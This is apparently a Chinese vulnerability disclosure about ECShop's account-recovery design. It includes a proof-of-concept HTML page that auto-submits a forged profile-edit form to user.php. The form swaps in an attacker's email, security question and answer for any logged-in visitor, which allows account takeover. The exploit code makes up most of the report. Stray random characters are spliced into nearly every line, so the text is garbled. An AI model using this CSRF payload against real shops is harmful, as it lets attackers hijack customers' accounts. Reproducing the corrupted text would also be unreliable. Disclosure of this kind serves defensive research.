简要描述:
3 h7 }1 n; W U$ l5 v* ~+ J2 m- hecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现$ {) U; t; g- r* M7 A
8 S9 Z2 G' G& e1 DDemo For:http://www.wooyun.org/bug.php?action=view&id=395+ R4 F8 q' a3 I1 Y
5 ]6 k6 P. }' }详细说明:& o( G8 |2 C& w+ f- t) n; m' P
利用csrf和xss可以突破官方所说的“障碍”
$ y% v# J: o( t: Q, k3 i# jxss版本已经有人说明5 e2 L( M' O! t1 {* c7 f; u
这里给出csrf版本
6 |/ {# F1 [8 D( ~" {2 J* O/ K: c$ j0 k) J1 |
漏洞证明:" N( ]2 n J3 r( n* g
<html>) q0 \9 m$ i) l% b. C
<body>
. f; a- O" A0 Q* c( T1 I<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
) [ s* j+ Y, o1 w# {<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
. L% @# j( H, z+ r: E<INPUT TYPE="text" NAME="act" value="act_edit_profile">
- A. I" p3 Q4 }& T<INPUT TYPE="text" NAME="sel_question" value="ecshop">% L+ Z( Q' Y( G2 M9 P
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
, ]. {7 M8 H1 P7 V</body>8 q W: [0 h8 o% Q& ^
<script>
9 }( Z( B" ] N6 F8 P' Ndocument.forms[0].submit();0 V) E% T/ `2 I2 N* z1 D
</script>0 \# z. G( n2 y. h P9 k6 ]
</html>
0 j6 c. A# S, ?, O构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失! Z- ?' U6 C E# Q t- K
# U% J: w" M+ r% C' e |